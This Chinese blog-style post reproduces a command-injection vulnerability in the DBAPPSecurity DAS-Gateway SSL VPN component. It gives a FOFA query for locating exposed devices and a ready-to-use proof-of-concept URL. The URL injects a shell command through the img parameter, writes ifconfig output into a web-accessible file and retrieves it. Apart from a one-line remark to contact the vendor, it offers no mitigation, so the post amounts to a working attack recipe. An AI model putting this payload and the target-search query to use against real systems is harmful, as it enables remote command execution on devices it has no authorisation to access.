【漏洞复现】某厂商明御安全网关sslvpn命令执行漏洞

Nx01 产品简介

明御安全网关是杭州安恒信息技术股份有限公司研发的一款智慧化安全网关产品。这款产品秉持安全可视、简单有效的理念,以资产为视角,构建了全流程防御的下一代安全防护体系。

Nx02 漏洞描述

明御安全网关存在sslvpn命令执行漏洞,攻击者可通过此漏洞获取服务器控制权限。

Nx03 产品主页

fofa-query: web.body="明御安全网关"

Nx04 漏洞复现

POC:

复制代码
/sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60ifconfig%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls

拼接URL/sslvpn/ceshi.txt

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
tiantianuser14 分钟前
NVMe IP现状扫盲
服务器·网络·tcp/ip
Jouzzy3 小时前
【iOS安全】使用LLDB调试iOS App | LLDB基本架构 | LLDB安装和配置
安全·ios·架构
不愧是你呀3 小时前
C++中单例模式详解
网络·c++·windows·单例模式
Rocky4014 小时前
HTTP和HTTPS
网络·网络协议·http
时之彼岸Φ5 小时前
网络攻防技术四:网络侦察技术
开发语言·网络
xiaohanbao095 小时前
day44 python 训练CNN网络并使用Grad-CAM可视化
网络·人工智能·python·深度学习·学习·机器学习·cnn
巴拉特好队友6 小时前
捋捋wireshark
网络·测试工具·wireshark
iummature6 小时前
wireshark分析国标rtp ps流
网络·测试工具·wireshark
这儿有一堆花6 小时前
Wireshark 使用教程:让抓包不再神秘
网络·测试工具·wireshark
藥瓿亭6 小时前
IPtables部署和使用
linux·运维·服务器·网络·iptables·防火墙·firewall